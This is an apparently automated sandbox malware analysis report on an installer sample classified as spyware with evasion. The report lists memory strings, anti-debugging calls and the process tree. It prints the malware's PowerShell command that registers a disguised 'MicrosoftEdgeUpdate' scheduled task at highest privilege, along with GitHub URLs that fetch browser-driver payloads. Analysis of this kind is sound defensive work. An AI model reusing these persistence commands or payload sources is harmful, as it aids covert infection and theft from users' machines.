      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
      Source: regsvr32.exe, 0000000E.00000002.2141520016.000000001BAF0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.14.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: regsvr32.exe, 0000000E.00000002.2141520016.000000001BB1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a1ee8ab1c36b1
      Source: regsvr32.exe, 0000000E.00000003.1588032598.000000001BBC4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV
      Source: regsvr32.exe, 0000000E.00000002.2141520016.000000001BB1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en89
      Source: edb.log.17.dr, qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda
      Source: powershell.exe, 0000000A.00000002.945864209.000002660148C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.963153072.0000026610078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1095561017.0000029390077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938149C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://ocsp.digicert.com0A
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://ocsp.digicert.com0C
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://ocsp.digicert.com0I
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://ocsp.digicert.com0P
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
      Source: qmgr.db.17.dr | String found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://rb.symcb.com/rb.crl0W
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://rb.symcb.com/rb.crt0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://rb.symcd.com0&
      Source: qmgr.db.17.dr | String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
      Source: qmgr.db.17.dr | String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
      Source: qmgr.db.17.dr | String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
      Source: qmgr.db.17.dr | String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://s.symcd.com0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://s.symcd.com06
      Source: powershell.exe, 0000000C.00000002.1145750310.00000293F4143000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft.co
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 0000000A.00000002.945864209.0000026600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.0000029380001000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.000000000373B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020880001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: qmgr.db.17.dr | String found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
      Source: qmgr.db.17.dr | String found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
      Source: qmgr.db.17.dr | String found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: 8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.881404803.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000001.00000000.883261373.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-JVPOA.tmp.7.dr, 8n26gvrXUM.tmp.6.dr, 8n26gvrXUM.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
      Source: powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139398628.000001C713899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: 8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.881404803.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000001.00000000.883261373.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-JVPOA.tmp.7.dr, 8n26gvrXUM.tmp.6.dr, 8n26gvrXUM.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
      Source: powershell.exe, 0000000C.00000002.1145750310.00000293F4143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://.VisualC
      Source: powershell.exe, 0000000A.00000002.945864209.0000026600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: is-J08NI.tmp.7.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://d.symcb.com/rpa0.
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://d.symcb.com/rpa06
      Source: regsvr32.exe, regsvr32.exe, 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
      Source: qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
      Source: qmgr.db.17.drString found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
      Source: powershell.exe, 0000000A.00000002.945864209.000002660148C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.963153072.0000026610078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1095561017.0000029390077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938149C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139398628.000001C713899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://www.digicert.com/CPS0

      System Summary

      Source: 14.2.regsvr32.exe.2f9131e.1.raw.unpack, KfF5HsZ6WWf1NQYJSA.csLarge array initialization: HcZdqQ5U4: array initializer size 305328
      Source: 14.2.regsvr32.exe.3130000.2.raw.unpack, KfF5HsZ6WWf1NQYJSA.csLarge array initialization: HcZdqQ5U4: array initializer size 305328
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EA040 memset,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,9_2_00007FFD348EA040
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348EA040 memset,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,RtlFreeHeap,NtGetContextThread,NtTraceControl,NtSetContextThread,NtClose,14_2_00007FFD348EA040
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFD348EFE90 appears 48 times
      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFD3497C350 appears 40 times
      Source: 8n26gvrXUM.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: 8n26gvrXUM.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: 8n26gvrXUM.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: 8n26gvrXUM.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: 8n26gvrXUM.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: is-JVPOA.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: is-JVPOA.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: is-J08NI.tmp.7.drStatic PE information: Number of sections : 11 > 10
      Source: 8n26gvrXUM.exe, 00000000.00000003.881404803.0000000002607000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 8n26gvrXUM.exe
      Source: 8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FE33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 8n26gvrXUM.exe
      Source: 8n26gvrXUM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: 14.2.regsvr32.exe.2f9131e.1.raw.unpack, KfF5HsZ6WWf1NQYJSA.csCryptographic APIs: 'CreateDecryptor'
      Source: 14.2.regsvr32.exe.3130000.2.raw.unpack, KfF5HsZ6WWf1NQYJSA.csCryptographic APIs: 'CreateDecryptor'
      Source: classification engineClassification label: mal100.spyw.evad.winEXE@27/31@0/2
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EB900 CreateToolhelp32Snapshot,memset,Process32FirstW,memcpy,memcpy,CloseHandle,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,9_2_00007FFD348EB900
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\unins000.dat
      Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\GlamorousBath
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8532:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9048:120:WilError_03
      Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\04cc3a8c0bf2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8532:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9048:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:304:WilStaging_02
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeFile created: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
      Source: 8n26gvrXUM.exeReversingLabs: Detection: 50%
      Source: 8n26gvrXUM.exeVirustotal: Detection: 55%
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeFile read: C:\Users\user\Desktop\8n26gvrXUM.exe
      Source: unknownProcess created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe"
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp" /SL5="$103F0,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Users\user\Desktop\8n26gvrXUM.exe   Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\8n26gvrXUM.exe   Section loaded: edgegdi.dll
